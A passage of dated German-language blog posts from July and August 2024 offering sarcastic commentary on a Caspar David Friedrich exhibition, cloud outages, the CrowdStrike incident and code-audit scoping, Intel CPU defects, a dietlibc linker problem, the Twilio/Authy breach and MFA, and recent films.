2. Tinder, OKCupid, Grindr & Co. lassen intime Daten abfließen.
  Ja, äh, natürlich tun sie das! Was dachtet ihr denn, womit die ihr Geld verdienen?
3. Agile hat Softwareentwicklung nachhaltig kaputt gemacht.
  Ich weiß!! Keiner versteht mehr, wie der Scheiß unter den drölfzig schrottigen Abstraktionen funktioniert, die auch noch alle ständig kaputt sind und "geupdated" (eigentlich: repariert) werden müssen. Am besten im Feld, beim Kunden.
  Wenn ihr jetzt denkt: Das hat bestimmt die CIA herausgefunden! Dann liegt ihr fast richtig: Moxie Marlinspike hat es herausgefunden.
4. Insolvenzen steigen gegenüber Vorjahr wieder zweistellig.
  Das wäre ja erstmal nicht weiter übel, wenn der Markt sich hier von den ganzen Multimedia-Startups und Digitalberater-Klitschen bereinigen würde, aber es sind vor allem Industrie-Firmen, die pleite gehen.
  Ich weiß, was ihr euch jetzt fragt. Hat das was mit dem Ölpreis zu tun? Aber nicht doch!1!!
  Am häufigsten traf es im Mai Unternehmen aus dem Bereich Verkehr und Lagerei. Auch Zeitarbeitsfirmen und Baubetriebe zeigen häufig ihre Zahlungsunfähigkeit an.
  Hat also nichts mit dem Ölpreis zu tun!1!!

Fri Aug 2 2024

[l] In Berlin gibt es gerade zum Caspar-David-Friedrich-Jubiläum in der Alten Nationalgalerie eine Sonderausstellung, zu der sie einmal sein Werk aus verschiedenen Museen zusammengeliehen haben und gesammelt zeigen.
Ich hatte in meinem Schulunterricht einen prägenden Moment, als der Kunstlehrer vorne den Einsamen Baum an die Wand projizierte und uns auftrug, das mal nachzumalen zu versuchen. Das Bild sah eigentlich ganz einfach aus und wir sind alle optimistisch gestartet und haben dann gemerkt, was da alles für Details drinstecken, die man richtig hinkriegen muss, und sind alle gescheitert.
Oh gucke mal, da ist ja eine Schafherde! Und das ist gar nicht bloß ein dicker Baumstamm sondern da lehnt ein Schäfer gegen! Auch die Farben wirkten einfach aber waren es nicht. Wie gesagt, eine prägende Erfahrung.
Als ich also hörte, dass es diese Ausstellung gibt, habe ich sofort Tickets zu klicken versucht. Online gibt es da eine Kauf-Seite, aber die waren immer alle weg. Tagestickets gab es überhaupt nie, und Zeitslot-Tickets immer nur zu unopportunen Zeiten.
Die Ausstellung lief seit Mitte April bis übermorgen. Heute bekam ich also Torschlusspanik und dachte mir, ich geh einfach mal ohne Ticket hin. Es gibt da ja eine Tageskasse, steht auch extra auf der Ticketkaufseite. Wir kamen um 11 an. Die Schlange wickelte sich einmal um den Platz davor. Egal. Jetzt sind wir schon hier. Wie lange kann es dauern. Ne Stunde?
Heute war seit langem der erste Tag, an dem es nicht brütend heiß und auch nicht turboschwül oder regnerisch war. Wenn ich da ne Stunde stehen muss, dann steh ich da halt ne Stunde.
Nach einer Stunde waren wir ungefähr 1/3 der Schlange vorgerückt. Na gut, dann halt zwei Stunden oder drei.
Am Ende waren es über sechs. Je näher wir dem Eingang kamen, desto langsamer ging es voran.
In meinem Kopf formulierte ich schonmal einen Blog-Rant vor, was das für eine Zumutung ist. Das ist die fucking Nationalgalerie, nicht irgendein Hinterhof-Etablissement! Das kann ja wohl nicht wahr sein, dass die Nationalgalerie es nicht schafft, ein paar populäre Bilder in vier Monaten allen zu zeigen, die sie sehen möchten!1!!
Ich fand, dass das Fall von veritablem Staatsversagen ist! Dass der Berliner Senat verkackt, das kennen wir ja nun hinlänglich. Aber das hier ist nicht die Berliner Staatsgalerie, das ist die Nationalgalerie!1!! Die hat genau eine Aufgabe: Die Bundesrepublik Deutschland gut zu repräsentieren und Menschen Kunst zu zeigen.
Wir googelten dann in der Schlange, dass die ungefähr tausend Besucher pro Tag haben. Das erscheint mir unangemessen wenig. Aber das ist der Durchschnitt über das Jahr, da werden auch weniger populäre Ausstellungen bei sein. Aber selbst das Doppelte erscheint mir noch zu wenig für eine Nationalgalerie.
Und dann kam ich endlich dran. Stellt euch mal vor, was ihr für eine Laune hättet, wenn ihr sechs Stunden ohne Getränk oder Essen Schlange steht. Und dann kommt so ein Typ und erklärt dir, du musst den Pulli an der Garderobe abgeben, den du an den Ärmeln um den Bauch gebunden hast. Egal, die Garderobe war kostenlos. Haben wir halt gemacht.
Tja, und dann passierte ein Wunder. Aus der Geschichte über das Versagen des Staates in Form der Nationalgalerie wurde plötzlich eine Geschichte über die transzendentalen Fähigkeiten von Kunst. Denn als ich diese wunderschönen Bilder sah, taten mir zwar vom vielen Stehen die Füße weg, aber es war egal. Der Ärger war weggewischt. Ich guckte mir die Bilder an, und sie waren wunderschön.
Überlegt euch mal, wie das beim Fußball gelaufen wäre! Die Ultras hätten die Innenstadt zerlegt!
Nicht so bei den Kunst-Ultras. Die gehen dann rein und lassen sich von der Kunst in höhere Sphären heben.
Mir tun jetzt immer noch die Füße weh, aber ich habe ihnen die sechs Stunden verziehen.
Nachdem drinnen alle Nase lang irgendein Alarm losging und sofort von dem Personal weggeklickt wurde, vermute ich, dass das ein CO2- oder Temperatur-Alarm war. Mehr Leute hätte man in das Gebäude schlicht nicht hereinlassen dürfen, ohne die Kunstwerke zu schädigen. Ich habe jedenfalls geschwitzt wie ein Tier, dabei war ich in kurzen Hosen und T-Shirt. Viele Leute (aber nicht so viele, dass man die Bilder nicht von Nahem sehen konnte!) erzeugen halt viel Hitze.
Zusammenfassung: Kunst ist geil. Guckt mehr Kunst.
An der Stelle übrigens ein dickes Lob für die Nationalgalerie, die ich oben verlinkt hatte. Die haben das in ordentlicher Auflösung abfotografiert und unter Creative Commons ins Netz gestellt. So muss das sein.

Tue Jul 30 2024

[l] Microsoft apologises after thousands report new outage
Seid ihr eigentlich auch in die Cloud gezogen? Weil die ja von Profis gemanaged wird und da nicht mehr ständig Dinge ausfallen?
*wieher*

Mon Jul 29 2024

[l] Es ist ja gerade mal wieder Fristende für die Steuererklärung, da lohnt sich zur Motivation ein kurzer Blick darauf, was mit den Steuergeldern so gemacht wird.
Trotz hoher Gewinne haben die 40 im DAX gelisteten Firmen in den vergangenen Jahren von staatlichen Subventionen in Milliardenhöhe profitiert.
Hier ne Milliarde, da ne Milliarde, nach ner Weile kommt da richtig Geld zusammen!
Allein 2023 flossen mindestens 10,7 Milliarden Euro an die 40 DAX-Unternehmen und damit fast doppelt so viel wie im Vorjahr mit sechs Milliarden.
Mit anderen Worten: Ein halbes Fusionskraftwerk!
Aber warte, Fefe, die staatliche Förderung, die ist bestimmt an Bedingungen gekoppelt. Die geht nur an Unternehmen, die dem Klimaschutz dienen oder so.
Der Energiekonzern E.ON habe mit mehr als 9,3 Milliarden Euro seit 2016 die meisten Subventionen erhalten.
Wo waren wir? Oh ja richtig. Klimaschutz. Immer schön an euren CO2-Fußabdruck denken!1!!
Update: Stellt sich raus: Wenn man nach Abgabefrist Einkommenssteuer 2024 fragt, kriegt man nicht die Frist in diesem Jahr für die Steuererklärung von 2023, sondern man kriegt die Frist im nächsten Jahr für die Steuererklärung für dieses Jahr. Dieses Jahr gilt noch verlängerte Abgabefrist bis 2.9. Hab ich mich umsonst gestresst.

Fri Jul 26 2024

[l] Erst hat die Post alle Filialen zugemacht, weil man ja auch in einem Späti eine "Filiale" nebenbei "betreiben" kann.
Jetzt macht die Post die Späti-Filialen zu, weil Packstationen billiger sind.
Und irgendwann wird jemandem auffallen, dass man das Porto dafür zahlt, dass die Post dem Empfänger zugestellt wird, nicht irgendeiner versifften Packstation.
Oder hey, vielleicht baut die Post auch "KI" in ihre Packstationen ein. Die auf Fragen genau so verwirrt reagiert wie "echte" Postfilialen. Das sollte nicht weiter schwierig sein oder viel Training brauchen. Geht eigentlich auch ganz ohne Training.
[l] Hey, seid ihr eigentlich in die Cloud gegangen?
Weil ihr euch gedacht habt, das wird da von Profis gemanaged, da gibt es dann keine Ausfälle mehr?
It's a bold strategy, let's see if it pays off!
Bitkom hat da mal eine Umfrage gemacht. Ergebnis:
4 von 10 Unternehmen berichten von Cloud-Ausfällen
Ja gut, wenn man dermaßen mit heruntergelassenen Hosen erwischt wird, und man auf echt überhaupt gar niemand anderen zeigen kann, weil man das vollständig selbst zu verantworten hat, dann werden an dieser Stelle die Optionen knapp. Da bleibt eigentlich nur eine Strategie aus Blackjack: Double Down!
Als Reaktion entwickeln Betroffene einen Notfallplan – und setzen auf die Multi-Cloud
Ja klar, denn zurück geht ja nicht. Da würden ja alles sehen, was wir für inkompetente Flachpfeifen-Quacksalber sind. Fehler eingestehen? Niemals!!
Außerdem haben wir ja unser Personal ausgedünnt, und wenn wir die jetzt zurück einstellen wollen würden, dann würden die ja marktübliche Gehälter fordern. Das können wir uns gar nicht leisten!1!!
Kurze Frage am Rande: Zahlt sich eigentlich eure Blockchain-Strategie schon aus? Wie hoch ist denn der ROI auf eure "KI"-Strategie so?
Nee, lasst euch nicht aufhalten. Macht lieber weiter wie bisher und hört erst auf mich, wenn das Kind im Brunnen ist.
Update: Eines Tages wird jemandem auffallen, dass es gar keine Inflation gab, sondern dass die Aufpreise einfach nur daher kamen, weil irgendwer ja den Cloud-Aufpreis zahlen musste. Und das werden ganz sicher nicht die sein, die ihn zu verantworten hatten. Logisch.
[l] Von der Leyen gives nod to €100 billion ‘CERN for AI’ proposal.
Umgerechnet fünf Fusionskraftwerke. Aber hey, "KI" braucht ja keinen Strom, gell?
Update: Falls ihr euch übrigens gefragt habt, wo eigentlich das Geld für diese Geldverbrennungsaktion herkommen soll: Das wird bei Internet-Infrastruktur-Programmen wie NGI eingespart, die damit OpenSSL-Audits und so gemacht hatten. Das war eines der ganz wenigen EU-Förderprogramme, das tatsächlich Ergebnisse vorzuweisen hat. Liegt möglicherweise daran, dass das von den Niederländern vorangetrieben wurde, nicht von Deutschland. Bei uns wäre die Kohle bei Fraunhofer versickert, ohne Ergebnisse oberhalb der Nachweisgrenze zu zeitigen.
Update: Man könnte fast vermuten, dass Flinten-Uschi NGI absichtlich weghaben will, weil der Kontrast zu ihren eigenen "Projekten" die Korruption der CDU so deutlich zeigt. Den Präzedenzfall konnte die CDU nicht dulden, dass jemand Fördermittel nimmt und nicht bloß unter seinen Wahlspendern verteilt.

Wed Jul 24 2024

[l] Ich möchte auch noch mal kurz aus Sicht eines Code Auditors auf diese Crowdstrike-Sache gucken.
Wie kommen solche Dinge zustande? Die hatten doch Code Audits von ihrer Software!
Das kann ich aufklären. Bei Code Audits sagen die Auftraggeber, was "in scope" ist und was nicht. Typischerweise sind Config-Dateien nicht in Scope, weil Crowdstrike findet, die können ja schließlich nur von uns kommen, und der Übertragungsweg ist kryptografisch gesichert, also kann da nichts passieren.
Dazu kommen so Überlegungen der Form (je nach Mächtigkeit der Konfigurationsmechanismen): Wenn der Angreifer DA Dinge zu unseren Kunden pushen kann, dann ist eh alles verloren!1!!
Am Anfang meiner Karriere habe ich mich über diesen Scope-Scheiß noch endlos aufgeregt und da gegen Windmühlen gekämpft. Ich habe z.B. wochenlang mit Microsoft verhandelt, dass USB eine Security Boundary ist, d.h. etwas, wo ein erfolgreicher Angriff schlecht ist und verhindert werden sollte. Microsoft fand damals, USB sei ein physischer Angriffsvektor und die seien eh nicht zu verhindern, da könne ja auch jemand mit einem Hammer kommen und das Gerät kaputthauen. Also war USB jahrelang kein Angriffsvektor, und damit auch nicht die Filesysteme und die Autorun-Dateien darauf. Das hat sich erst geändert, als das USB-Forum "wireless USB" standardisierte, also das über Funk erreichbar war. Das kam nie weit, aber hat fundamental Tore aufgemacht bei Microsoft und ich vermute auch bei anderen Betriebssystemherstellern.
Ich habe bei Microsoft auch mal den SMB-Code auditiert, und habe dann einen Riesenschreck gekriegt, als die ETERNALBLUE von der NSA bekannt wurde. Hatte ich das übersehen? Nein, hatte ich nicht. Das Scope endete ca 3cm links davon. Ich sollte SMB angucken, und ETERNALBLUE war ein RPC über eine Named Pipe von SMB. Andere Arbeitsgruppe, out of scope.
Wenn ihr also mal einen Code Audit oder Pentest beauftragt, tut mir einen Gefallen und erzählt den Auditoren nicht, was in Scope ist und was nicht. Ihr habt die eingeladen und beauftragt, weil ihr glaubt, dass die wissen, wo die Bugs sind. Dan lasst sich auch dort gucken, um Himmels willen!

Tue Jul 23 2024

[l] Gleich mehrere Leser weisen darauf hin, dass Intel das Problem, das sie jetzt mit magischem Microcode lösen wollen, so lange ausgesessen und hinausgezögert haben, dass der magische Microcode erst nach den Benchmarks der Fachpresse für Zen 5 stattfinden.
Wenn also der Microcode die Performance senkt, wovon ich mal ausgehen würde, dann haben die Zen 5 Vergleichsbenchmarks alle noch die besseren Zahlen von dem aktuellen Microcode drin.
Ich würde mich übrigens auch wundern, wenn Intel das nicht absichtlich gemacht hat, dass die CPUs zu eine so hohe Spannung ziehen. Das ist leider bei Intel und AMD schon lange üblich. Die Technologie wäre so weit, aber dann wären halt soundsoviel Prozent der produzierten CPUs direkt Ausschuss, weil die durch Produktionsmängel nicht so effizient sind.
Weil die Chiphersteller alle noch keinen Dollar gesehen aben, den sie nicht als Profit einsacken wollten, haben wir jetzt alle völlig sinnlos heizende CPUs in unseren Kisten drin.
Mein aktueller Arbeitslaptop ist ein Asus Zephyrus G14 von 2022, den ich mir vor allem deshalb gekauft habe, weil es hieß, AMD habe jetzt raus, wie man sparsame und kühl bleibende CPUs baut, und bei Asus gäbe es ja auch immer Undervolting-Tools. Tatsächlich ist in diesem Laptop von Sparsamkeit nichts zu sehen. Unter 20W habe ich das Gerät noch nicht gekriegt im Idle, und das Kühlsystem ist so unterdimensioniert, dass ich zum Zocken CPU Turbo Boost deaktiviert habe, weil das Teil sonst nach ner Weile überhitzt und Not-Aus macht. Für die Zephyrus-Geräte gibt es in der Tat Undervolting-Tools, aber (als einziges in der Baureihe?) nicht für mein Gerät.
Es ist echt zum Mäusemelken.
Ein ganz anderes Bild liefert mein Reiselaptop, auch AMD, ein Framework 14". Der ist ohne großes Zutun im Idle unter 5W. So hatte ich mir das vorgestellt.
Leider hat Windows offenbar irgendwann von der Anforderungsliste genommen, dass Laptops Suspend können sollen. Es reicht, wenn sie dieses neue Pseudo-Suspend haben, wo das Gerät dann schneller aufwacht, aber nie wirklich suspendiert war. Ich persönlich scheiße ja auf Windows und kann jetzt unter Linux nicht mehr suspend machen und der Akku hält dann über 24h wie bei meinem Reiselaptop davor.
Framework hat inzwischen eine neue BIOS-Version herausgegeben, aber wenn ich die einspiele, kommt das Gerät nicht wieder hoch. Immerhin erkennt es das und bootet nach dem Hart-Not-Aus dann wieder das alte BIOS.
Das muss alles unglaublich schwierig sein, den Leuten das zu verkaufen, was sie gerne haben wollen.
[l] Zu der Intel-Situation gibt es jetzt ein Update. Das ist soweit explodiert, dass Intel nicht länger "gehen Sie weiter, gibt nichts zu sehen hier" machen konnte, und sie haben ein Statement publiziert.
Das Statement sagt im Wesentlichen: Wir machen einen Microcode-Fix.
Vorher ging die Theorie um, dass ihnen die Vias wegkorrodieren (Vias sind Verbindungen innerhalb des Chips; wenn die wegkorridieren, kannst du nur wegschmeißen und neu kaufen). Das bestreitet Intel jetzt explizit, aaaaaaber einer der Kommentatoren darunter zitiert einen Intel-Techie:
A member of Intel staff has commented on this on Reddit. What they said was "...We can confirm that the via Oxidation manufacturing issue affected some early Intel Core 13th Gen desktop processors. However, the issue was root caused and addressed with manufacturing improvements and screens in 2023. We have also looked at it from the instability reports on Intel Core 13th Gen desktop processors and the analysis to-date has determined that only a small number of instability reports can be connected to the manufacturing issue".
Das möchte ich hier mal kommentieren. Intel gibt also zu, dass ihnen ihre Vias wegkorrodiert sind, aber sie haben nicht etwa einen Rückruf gemacht oder auch nur ihre Kunden informiert. Sie haben einfach behauptet, das beträfe nur wenige Kunden und haben geschwiegen und gehofft, dass die man die dann halt im Support dazu bringen kann, neue CPUs zu kaufen.
Das, meine Damen und Herren, ist die Rechnung dafür, dass wir Intel mit ihrem Meltdown- und Spectre-Scheiß haben durchkommen lassen. Die Welt war betroffen und alle haben sich gemeinsam darauf geeinigt, einfach weiter die alten CPUs zu benutzen, und irgendwelche halbseidenen Mitigations in Mikrocode oder sogar im Kernel von Linux oder Windows zu machen.
Das hat dann zweistellig Prozent Performance gekostet. Ich verweise an der Stelle immer gerne darauf, wie viel Geld Intel fordert, wenn man einen Xeon mit 10% mehr Performance kaufen will! Das sind betäubende Summen! Und die ganze Welt hat einfach den Aufpreis bezahlt und dann die bezahlte Performance verloren und Intel musste überhaupt nichts zahlen.
Das war ein Kardinalfehler. Damit haben wir Intel signalisiert: Wisst ihr was? Es ist egal, wie kaputt eure Prozessoren sind. Ihr lallt dann einfach was von Microcode-Update.
Genau das passiert jetzt. Würde mich nicht mal wundern, wenn das eine komplette Nebelkerze ist mit dem Microcode.
Warum sage ich das? Weil Intel ihre Kunden die ganze Zeit nach Strich und Faden belügt.
1. Problem? Welches Problem? Gibt kein Problem!
2. Das sind bestimmt die Übertakter. Das haben wir denen ja gleich gesagt!
3. Das Übertakten, das waren die fiesen Mainboardhersteller!
4. (Jetzt sind wir bei) Wir fixen das kurz im Mikrocode.
Alle bisherigen Aussagen von Intel waren dreiste Lügen, um ihre Profite auf Kosten der Kunden zu maximieren. Ich sehe keinen Grund, wieso die aktuelle Äußerung glaubwürdiger sein sollte als die davor.
Wir leben jetzt in einer Welt der Krisenkommunikation. Alle lügen und betrügen nur noch, dass die Schwarte kracht. Die nächste Äußerung wird dann sein: Ja gut aber das betraf ja nur die bis 2024 verkauften CPUs! In der nächsten Generation haben wir das gefixt!1!!
Ich persönlich glaube Intel gar nichts mehr, und ihr solltet ihnen auch nichts mehr glauben. Wenn es nach mir ginge, würden die Verbraucherschützer und/oder Aufsichtsbehörden da ein paar Milliarden Strafe extrahieren und unter den geprellten Kunden verteilen.
[l] Ich habe hier gerade ein faszinierendes dietlibc-Problem.
dietlibc hat eine libc.a und eine libpthread.a. Wenn man mit -pthread baut, wird auch libpthread.a reingelinkt.
Mehrere Symbole gibt es sowohl in libc als auch in libpthread, z.B. wenn man fputc aufruft, um ein Zeichen in ein FILE* zu schreiben. Die libc-Variante schreibt halt ein Zeichen, und die libpthread-Variante holt sich einen Mutex, schreibt dann das Zeichen, und lässt den Mutex dann wieder gehen.
Für die Korrektheit des Programms ist es also wichtig, dass die libpthread-Variante gewinnt.
Das ist relativ einfach:
```
$ gcc -o main main.c -lpthread -lc
```
OK, nächstes Problem: fopen. fopen ruft eine Init-Funktion auf, die ein FILE* alloziert und initialisiert. Die Variante der Init-Funktion in libpthread alloziert mehr Platz für den Mutex und initialisiert den. So und jetzt kommt das Problem: Hier gewinnt bei obigem gcc-Aufruf nicht etwa die Variante aus libpthread sondern die aus libc.
Ich habe mal ein Ticket aufgemacht bei GNU binutils (wo GNU ld herkommt), und die um Rat gebeten. Die meinten, ich soll -lc -lpthread machen.
Ich habe also einen kleinen Demonstrator gebaut, bei dem das auch nicht hilft. Schlimmer noch: Es gibt ja noch andere Linker als GNU ld. Es gibt noch GNU gold (auch aus binutils), lld (von LLVM) und mold (separates Projekt von dem Autor von lld). ld und gold sind sich einig, und lld und mold sind sich in die Gegenrichtung einig.
Das ist jetzt ein ziemlich riesiges Problem für mich, denn wenn ich nicht dafür sorgen kann, dass die Init-Funktion aus libpthread immer gewinnt, dann kriege ich Speicherkorruption, weil die aus libc zu wenig alloziert, aber dann jemand auf dem nicht mitallozierten Mutex herumpolkt. Und das Programm ist natürlich auch kaputt dann.
Falls ihr mal gucken wollt: Hier ist das binutils-Ticket. Ich bin mal sehr gespannt, was die Nerds da jetzt vorschlagen.

Fri Jul 19 2024

[l] Wisst ihr noch, was wir uns alle für Sorgen gemacht haben vor den russischen Cyberkriegern? Die könnten hier alles runterfahren!!
Und wovon wurden wir jetzt tatsächlich runtergefahren? Von amerikanischem Schlangenöl.
Genau mein Humor an der Stelle: Die Tagesschau so: "Es sind keine Cyberangriffe". Nicht? Fühlt sich aber so an für mich. Wieso denn nicht?
Oh, weil wir die Angreifer noch dafür bezahlt haben? Mann sind wir bekloppt!

Sat Jul 13 2024

[l] Ich könnte mich ja bei diesem ganzen Cloud-Scheiß immer kaputtlachen über die gedanklichen Verrenkungen, die die Leute machen müssen, um das überhaupt aussprechen zu können.
CumEx-Olaf hat sich gerade vom SAP-Chef eine "souveräne Cloud" auf Microsoft-Basis ans Schienbein labern lassen. Merkt der das nicht selber? Wenn Microsoft dann nicht souverän!
Noch dringender als souverän fände ich ja "funktioniert zuverlässig". Da ist Microsoft ja eh direkt draußen.
Was geht im Kopf von jemandem vor, der sich komplett von einem US-Konzern abhängig gemacht hat, und dann glaubt, wenn der Scheiß bei SAP läuft ist die Abhängigkeit plötzlich geringer?
Und zwar nicht nur marginal geringer! "Souverän" ist das dann plötzlich? Wie meinen?!?
Jemand zuhause, McFly?
Das sind wahrscheinlich dieselben Leute, die glauben, wenn sie die Software in ihrem Auto von einer Drittfirma machen lassen, dann ist das nicht ihre Schuld, wenn Leute sterben.
Sehr geil auch:
Auch aufwendige technische Schutzmaßnahmen sind geplant: Laut Delos wird Microsoft den Behörden zum Beispiel den Quellcode aller Updates bereitstellen.
Ja geil ey! Und wer auditiert das dann? Ich stellt schon mal mein Telefon auf laut. Oh ich weiß! Das kann der TÜV machen!1!!

Thu Jul 11 2024

[l] Wisst ihr, was die Bafin rausgefunden hat? Kommt ihr NIE drauf!
Die ganzen "Vorfälle" bei Zahlungsdienstleistern? Das waren gar keine Cyber-Russen. Die waren fast alle hausgemacht.
Nein, wirklich! Ganz normales Frontalversagen der Industrie! Nix Cyber-Cyber!
Für den niedrigen Anteil an Sicherheitsvorfällen könnte es verschiedene Gründe geben: Etwa, dass es den Instituten gelang, Angriffe erfolgreich abzuwehren, Angriffe keine Auswirkungen auf zahlungsbezogene Dienste hatten oder die Auswirkungen die Meldeschwellen nicht überschritten.
Ja genau. So wird das gewesen sein. Die sind alle zu blöde, um ihre Systeme vom implodieren abzuhalten, selbst wenn kein Angriff vorliegt, aber sie sind schlau genug, alle Angriffe abzuwehren. So wird das gewesen sein, liebe Bafin. *stirnklatsch*
Die wahrscheinlichere Variante wird ja wohl sein, dass die Angreifer sich das Kartenhaus angeschaut haben, und sich gedacht haben: Die angreifen wäre ja wie ein behindertes bettelndes Kind in der Fußgängerzone treten! Das können wir mit unserem Gewissen nicht vereinbarn! Sozusagen ein vorauseilendes Indonesien-Gambit.
Lohnt sich ja auch nicht, so einen Zahlungsdienstleister kaputtzumachen. Die sind eh schon so kaputt, da kannst du ja nicht mal Street Cred für claimen. (Danke, Milan)

Fri Jul 5 2024

[l] Von mir braucht es keinen Kommentar zur UK-Wahl. Jonathan Pie macht das.
Update: Für die nytimes hat er auch ein schönes Video gemacht.

Thu Jul 4 2024

[l] Ich habe mich ja schon ein paar Mal abfällig über MFA geäußert, wie es heutzutage praktiziert wird. Das liegt daran, dass das immer nur eine Theaterauführung ist. Niemand hat da ernsthaft die Kosten und den Nutzen aufgewogen oder überhaupt nur darüber nachgedacht.
Das sieht man ganz gut an Fällen wie diesen.
Twilio this week confirmed suffering a data breach after hackers leaked 33 million phone numbers associated with the Authy application.
NATÜRLICH haben sie ihn erst zugegeben, nachdem die Staatsanwaltschaft die Beweise gegen sie in der Hand hatte. NATÜRLICH haben die da Millionen von Datensätzen herumliegen gehabt. NATÜRLICH kam keiner von deren Auftraggebern auf die Idee, da mal nachzugucken, mit was für einer unseriösen Klitsche sie da ihre Verträge abschließen. Und NATÜRLICH stand da bei keinem Auftraggeber in den Verträgen eine Konventionalstrafe pro wegkommendem Datensatz drin.
Weil das halt alles nicht Security sondern Theater ist.
“While Authy accounts are not compromised
Nee, natürlich nicht. Das geben sie erst zu, wenn die Staatsanwaltschaft es beweisen kann. Wie immer bei den Tech Bros.
In der Praxis wollen euch alle 2FA aufdrücken, und implementieren es dann hinten schrottigst bis völlig kaputt. Warum ist das so? Weil es nicht um 2FA oder Security geht, sondern es geht darum, das Narrativ zu etablieren, dass der User hier das Sicherheitsproblem ist, nicht die Bank. Wir sprechen jetzt solange über den CO2-Footprint, äh, die Dinge, die der User machen kann, bis bei jedem auftretenden Problem sofort alle denken: Da wird wohl der User was nicht ordentlich gemacht haben.
Zur Erinnerung: Wir reden hier vom zahlenden Kunden. Der Kunde zahlt und kauft damit einen Service, die Bringschuld inklusive ordentlich machen und Security liegt beim Verkäufer. Nicht beim Kunden!
Im Übrigen hilft 2FA natürlich überhaupt nicht gegen Hacker bei denen im System. Wer bei denen im System ist, braucht sich ja nicht mehr deren System gegenüber zu authentisieren.
Ich persönlich hab jetzt schon mehrfach Hacks erlebt, bei denen meine Daten betroffen waren. Noch kein einziges Mal war es meine Seite, auf der die Daten weggekommen sind. Immer die andere Seite. Deshalb geben ich denen auch jeweils nur das absolute Minimum an Daten und lobbyiere gegen Gesetze, die Hotels zum Sammeln von Meldedaten zwingen.
Lasst euch nicht von 2FA-Vertrieblern verarschen.
Übrigens, am Rande. Hilft 2FA denn, wenn euer Rechner gehackt wurde? Nein, natürlich auch nicht! Nicht mal dann hilft 2FA! Euer 2FA-Gerät sagt euch doch nicht, was ihr da gerade bestätigt? Das steht auf dem Display vom gehackten Rechner. Niemand garantiert euch, dass ihr gerade das bestätigt, was ihr zu bestätigen glaubt. Außer euer 2FA-Gerät hat ein eigenes Display, das diese Daten anzeigt. Und dann ist es unattraktiv teuer und so komplex, dass es wahrscheinlich auch gehackt werden könnte.
Die Postbank hat z.B. eine App, die das tut. Und ohne diese App kann man sich bei denen nicht mal einloggen. Man loggt sich auch nicht mit seinem Namen oder seiner Kontonummer ein sondern mit einer alphanumerischen ID. Wenn die wegkommt, kann der Angreifer damit genau nichts machen.
Was tut also die Postbank? Sagt dem Browser, er soll sich die ID dort nicht merken. Hat das irgendeinen Security-Zweck? Nein. Das ist reine Schikane von Nichtsblickern, die mir gegenüber erfolglos zu simulieren versuchen, dass sie was von Security verstehen. Tun sie nicht.
Update: Was mich ja besonders fertig macht: Das war nicht das erste Mal. Aber keiner von euch schmeißt Zulieferer raus, die ihre Security verkacken. Warum auch?! Die haben ja jetzt gepatcht!1!!
Es findet ja auch niemand mehr negativ, wenn einen Hersteller mit mehreren Patches pro Woche fluten. Das wird sogar positiv gesehen! Immer dran denken: Jeder Patch heißt, dass die was verkackt haben. Die haben ihren Kunden kaputte Produkte geliefert und du trägst nicht nur das Risiko, darüber gehackt worden zu sein, sondern auch das Risiko, dass ihr Patch kaputt ist und deine Produktion zerschießt.
Update: Falls jemand keinen Bock hatte, die Primärquelle zu lesen (*fingerwackel*), hier noch ein Money Quote daraus:
Twilio found no evidence that the hackers gained access to its systems or that they obtained other sensitive data, but as a precaution urged Authy users to install the latest Android and iOS security updates.
Der Handlungsbedarf ist nicht etwa bei der Firma, die die Daten ihrer User über einen API-Endpunkt in die Welt geblasen hat. Nein, nein, mein Herr! Der Handlungsbedarf ist bei den Kunden, deren Daten hier vergewaltigt wurden. Zum Kotzen, sowas.
[l] Netflix hat gerade einen neuen Beverly-Hills-Cop-Film veröffentlicht.
Den kann man gut gucken. Ich habe ihn gestern geguckt und hatte viel Spaß. Alleine schon die Exposition in den ersten Minuten ist ganz großes Kino.
Jetzt ein bisschen eine Kritik von mir.
Auf der einen Seite ist das natürlich ein Money Grab, der auf den Nostalgie-Zug aufspringt, um den Fans der alten Serie nochmal ein paar Dollar aus der Tasche zu ziehen.
Und leider werden hier ein paar typische Muster reproduziert, die schon bei anderen Money Grabs die alten Fans verschreckt haben: Alle männlichen Figuren sind jetzt alt und müde und waren in der Zwischenzeit Deadbeat Dads und so weiter, haben Ärger mit ihrer Ehefrau, haben ihre Familien vernachlässigt etc pp.
Das finde ich persönlich sehr schade, diesen Drang, alte Helden zu dekonstruieren anstatt sie einfach stehen zu lassen. Aus heutiger Perspektive guckt sich niemand Commando von Schwarzenegger an und denkt sich: whoa, toller Mann, was für ein Vorbild!1!!
Aber anders herum: Filme, die ich in meiner Jugend und Kindheit geguckt habe, sind Teil meiner Identität geworden. Das empfinde ich nicht als positiv, wenn alle modernen Sequels erstmal die alten Actionhelden kaputtkloppen müssen. Das war bei Star Wars so, bei Indiana Jones, gefühlt überall ist das jetzt so. Sehr schade. Da will sich ein Produzent an die sich missverstandenen fühlenden Jugendlichen heranwanzen, klar, aber man kann sich auch an jemanden heranwanzen, ohne die anderen Teile des Publikums zu ohrfeigen.
Dieser Film hat auch Anflüge dieses Musters, aber vergleichsweise wenig ausgeprägt. Wir treffen Foleys Tochter, inzwischen eine erwachsene Anwältin, die pro Bono einen Fall übernimmt. Gefühlt 10-20 Minuten des Films gucken wir einfach nur zu, wie sie herumbitcht, dass er ja nie da gewesen sei für sie, und gar nicht ihr echter Vater sei deshalb. Muss das sein? Immerhin kriegt der Film dann noch die Kurve und wir erfahren, dass nicht Foley sondern sie den Kontakt abgebrochen hat, dass sie ihren Nachnamen geändert hat, und dass Foley sie überhaupt nur von Detroit an die Westküste geschickt hat, weil ihr Leben in Gefahr war, und am Ende können sie ihre Differenzen ausräumen. Das erfährt man aber nur, wenn man nicht nach den ersten 10 Minuten nervigen Herummeckern dieser Tochter-Figur, mit der wir als Publikum nichts verbinden, einfach das Tab zumacht und lieber was anderes guckt. Wenn ihr dran bleibt, ist das ein lustiger Actionfilm, der Spaß macht.
Übrigens auch Spaß gemacht hat mir in letzter Zeit ein anderer Film: The Fall Guy. Aber wartet vielleicht auf die Extended Version, die Anfang August erscheinen soll. Die ist nochmal 20 Minuten länger.
Fall Guy ist von dem Ex-Stuntman-Regisseur, der uns auch John Wick gebracht hat (den 1. in der Reihe!), und es geht um The Fall Guy, die Serie, die bei uns als Ein Colt für alle Fälle lief. Im Wesentlichen ist das also ein Film von Stuntmen für Stuntfans über Stuntmen. Der Film hat auch in der Nicht-Extended-Version schon Überlänge, aber davon merkst du beim Gucken nichts. Two Thumbs Up. Endlich mal wieder echte Stunts und nicht dieser ganze CGI-Bullshit.

Tue Jul 2 2024

